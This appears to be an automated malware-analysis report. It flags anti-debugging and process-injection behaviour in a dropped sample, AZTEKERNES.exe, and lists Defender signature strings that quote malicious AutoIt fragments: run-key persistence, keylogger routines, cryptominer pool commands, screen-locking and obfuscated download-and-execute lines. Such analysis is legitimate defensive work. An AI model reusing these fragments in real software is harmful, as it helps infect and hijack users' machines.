Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: =8*.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: KF*.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-armel.exe

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

System information queried: ModuleInformation

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

Process information queried: ProcessInformation

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582B030 FindNextFileW,FindClose,FindFirstFileW,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B5830B00 GetProcessHeap,HeapFree,

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8F0C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C86 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F89A8 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B584BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_0040784E rdtsc

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_022F2293 LdrInitializeThunk,

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584BF4C SetUnhandledExceptionFilter,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5833BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: AZTEKERNES.exe.1.dr

Jump to dropped file

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A00000

DLL side loading technique detected

Show sources

Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MpOAV.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MpClient.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MsMpLics.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MsMpLics.dll

Source: unknown

Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'

Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ra2!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringreplace ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " , "n" , "mi" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: chrw ( bitxor ( asc (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_destroykey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_shutdown
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_decryptdata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/covitse.pi!msr
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:allowlist:injector.autoit.mx
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: #autoit3wrapper_res_field=companyname\|genesis venture investment co., ltd.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: wisest<wisest@vip.qq.com>
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:virtool:win32/autinject.g!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $xor = bitxor ( $xor , $len + $ii )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: rtlupd64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: execute ( "@appdatadir" ) & "\winlogons"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#trojan:win32/autoinjec.sa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/autoitinject.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enativ.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _blockinputex ( 3 , "[:alpha:]\|[:number:]\|{enter}\|{backspace}
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: if winclose =
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: & chr ( 92 ) & $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ] = [ "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: inetget ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .zip" , "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .zip" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: p = true )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return seterror (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "313232"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "3937"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $extension = "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " , "c:\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0-o strat
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20'~
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: [^\]+
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:lastfolder
